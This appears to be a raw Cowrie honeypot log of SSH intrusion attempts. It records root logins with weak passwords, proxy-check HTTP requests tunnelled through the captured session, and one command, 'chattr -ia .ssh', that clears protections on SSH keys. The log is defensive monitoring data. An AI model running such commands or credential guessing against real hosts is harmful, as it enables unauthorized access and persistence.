{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4056,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:4056","sensor":"my-vps","timestamp":"2025-08-31T03:46:30.416232Z","session":"f0f1f5be11d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:30.467287Z","src_ip":"77.83.207.83","session":"f0f1f5be11d6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:46:30.601424Z","src_ip":"212.227.235.229","session":"2dbdbeb90289"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":25838,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:25838","sensor":"my-vps","timestamp":"2025-08-31T03:46:30.612888Z","session":"f0f1f5be11d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:30.663626Z","src_ip":"77.83.207.83","session":"f0f1f5be11d6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":20396,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:20396","sensor":"my-vps","timestamp":"2025-08-31T03:46:30.805193Z","session":"f0f1f5be11d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:30.856094Z","src_ip":"77.83.207.83","session":"f0f1f5be11d6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:30.907527Z","src_ip":"77.83.207.83","session":"f0f1f5be11d6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":55744,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc4881ecdf87","protocol":"ssh","message":"New connection: 77.83.207.83:55744 (1.2.3.4:22) [session: dc4881ecdf87]","sensor":"my-vps","timestamp":"2025-08-31T03:46:30.958110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:30.967977Z","src_ip":"77.83.207.83","session":"dc4881ecdf87"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:31.009694Z","src_ip":"77.83.207.83","session":"dc4881ecdf87"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:31.265227Z","src_ip":"77.83.207.83","session":"dc4881ecdf87"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1425,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:1425","sensor":"my-vps","timestamp":"2025-08-31T03:46:31.317152Z","session":"dc4881ecdf87"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:31.368261Z","src_ip":"77.83.207.83","session":"dc4881ecdf87"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11825,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:11825","sensor":"my-vps","timestamp":"2025-08-31T03:46:31.513491Z","session":"dc4881ecdf87"}
{"eventid":"cowrie.session.closed","duration":"44.4","message":"Connection lost after 44.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:31.535336Z","src_ip":"212.227.125.160","session":"06bc6d1c0b1f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:31.564761Z","src_ip":"77.83.207.83","session":"dc4881ecdf87"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":17518,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:17518","sensor":"my-vps","timestamp":"2025-08-31T03:46:31.709687Z","session":"dc4881ecdf87"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:31.760880Z","src_ip":"77.83.207.83","session":"dc4881ecdf87"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:31.812970Z","src_ip":"77.83.207.83","session":"dc4881ecdf87"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":55858,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ae8bf822893","protocol":"ssh","message":"New connection: 77.83.207.83:55858 (1.2.3.4:22) [session: 9ae8bf822893]","sensor":"my-vps","timestamp":"2025-08-31T03:46:31.862367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:31.863013Z","src_ip":"77.83.207.83","session":"9ae8bf822893"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:31.913419Z","src_ip":"77.83.207.83","session":"9ae8bf822893"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:32.164854Z","src_ip":"77.83.207.83","session":"9ae8bf822893"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1676,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:1676","sensor":"my-vps","timestamp":"2025-08-31T03:46:32.215993Z","session":"9ae8bf822893"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:32.266720Z","src_ip":"77.83.207.83","session":"9ae8bf822893"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu123","message":"login attempt [root/ubuntu123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:32.385858Z","src_ip":"212.227.235.229","session":"2dbdbeb90289"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":5096,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:5096","sensor":"my-vps","timestamp":"2025-08-31T03:46:32.408558Z","session":"9ae8bf822893"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:32.458935Z","src_ip":"77.83.207.83","session":"9ae8bf822893"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":3411,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:3411","sensor":"my-vps","timestamp":"2025-08-31T03:46:32.600696Z","session":"9ae8bf822893"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:32.650980Z","src_ip":"77.83.207.83","session":"9ae8bf822893"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:32.701998Z","src_ip":"77.83.207.83","session":"9ae8bf822893"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":55934,"dst_ip":"1.2.3.4","dst_port":22,"session":"44271a9f08ec","protocol":"ssh","message":"New connection: 77.83.207.83:55934 (1.2.3.4:22) [session: 44271a9f08ec]","sensor":"my-vps","timestamp":"2025-08-31T03:46:32.751542Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:32.752342Z","src_ip":"77.83.207.83","session":"44271a9f08ec"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:32.802988Z","src_ip":"77.83.207.83","session":"44271a9f08ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:46:32.923300Z","src_ip":"212.227.235.229","session":"2dbdbeb90289"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T03:46:32.924072Z","src_ip":"212.227.235.229","session":"2dbdbeb90289"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T03:46:32.925097Z","src_ip":"212.227.235.229","session":"2dbdbeb90289"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:33.055268Z","src_ip":"77.83.207.83","session":"44271a9f08ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":30053,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:30053","sensor":"my-vps","timestamp":"2025-08-31T03:46:33.106899Z","session":"44271a9f08ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:33.157901Z","src_ip":"77.83.207.83","session":"44271a9f08ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":14401,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:14401","sensor":"my-vps","timestamp":"2025-08-31T03:46:33.300790Z","session":"44271a9f08ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:33.351160Z","src_ip":"77.83.207.83","session":"44271a9f08ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":16036,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:16036","sensor":"my-vps","timestamp":"2025-08-31T03:46:33.493226Z","session":"44271a9f08ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:33.544120Z","src_ip":"77.83.207.83","session":"44271a9f08ec"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:33.596450Z","src_ip":"77.83.207.83","session":"44271a9f08ec"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":56045,"dst_ip":"1.2.3.4","dst_port":22,"session":"3de593ceea67","protocol":"ssh","message":"New connection: 77.83.207.83:56045 (1.2.3.4:22) [session: 3de593ceea67]","sensor":"my-vps","timestamp":"2025-08-31T03:46:33.644794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:33.645457Z","src_ip":"77.83.207.83","session":"3de593ceea67"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:33.695268Z","src_ip":"77.83.207.83","session":"3de593ceea67"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:33.943805Z","src_ip":"77.83.207.83","session":"3de593ceea67"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":20015,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:20015","sensor":"my-vps","timestamp":"2025-08-31T03:46:33.994435Z","session":"3de593ceea67"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:34.044530Z","src_ip":"77.83.207.83","session":"3de593ceea67"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":18769,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:18769","sensor":"my-vps","timestamp":"2025-08-31T03:46:34.188172Z","session":"3de593ceea67"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:34.238170Z","src_ip":"77.83.207.83","session":"3de593ceea67"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":13119,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:13119","sensor":"my-vps","timestamp":"2025-08-31T03:46:34.380237Z","session":"3de593ceea67"}
